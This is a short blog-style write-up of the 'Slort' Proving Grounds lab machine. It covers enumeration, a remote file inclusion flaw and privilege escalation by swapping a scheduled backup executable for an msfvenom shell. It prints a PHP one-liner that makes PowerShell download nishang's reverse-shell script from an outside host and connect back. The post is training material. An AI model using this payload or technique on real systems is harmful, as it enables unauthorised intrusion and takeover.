PG Slort
I enumerate FileZilla and MySQL first. That FTP version has no remote execution vulnerability. MySQL won't let me connect. I believe there is a program called sqsh that can circumvent that issue. However I move on.
The port 4443 and 8080 host the same website. An RFI vulnerability exists.
I get stuck here. Multiple reverse shells do not work. I use nishang and that works. https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1. Command: <?php system("powershell iex (New-Object Net.WebClient).DownloadString('http://192.168.49.232/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.49.232 -Port 443")?>
Priv Esc
I get stuck here for hours and hours. I use plink.exe to get to MySQL. Nothing. I use winPEAS. Nothing. Sherlock. Nothing. PowerUp. Kernel exploits. Nothing. Stuff is there, but for Edge. I use local_exploit_suggester on metasploit. Nothing. I see a C:\Backup folder, walk in, and walk out. Which is the problem. The priv esc was right there.
I used a hint and it said "go to backups". Then I thought to replace the TFP.EXE with my already existing msfvenom shell.exe I gave to rupert. It works.
Questions
- Winpeas.exe binary download does not exist anymore. And I don't feel like compliling it with C#. Where to get this. Winpeas.bat, I don't like it. It's extremely slow and Powershell does not like it. Keeping my ~2 year old winPEAS isn't a solution either.
- How to port forward more than one port with Plink
- Does a pspy32 exist for Windows. Where I would see this ~5 minute process. Instead of guessing something is happening in the background. Very easy on Linux, not sure for Windows
Lessons Learned
- Took me too long to think of RFI. Even if its rare, try it anyway.
- C:\Backups is out of place.
- Accidentally remembered php:filters exist
Comments
Post a Comment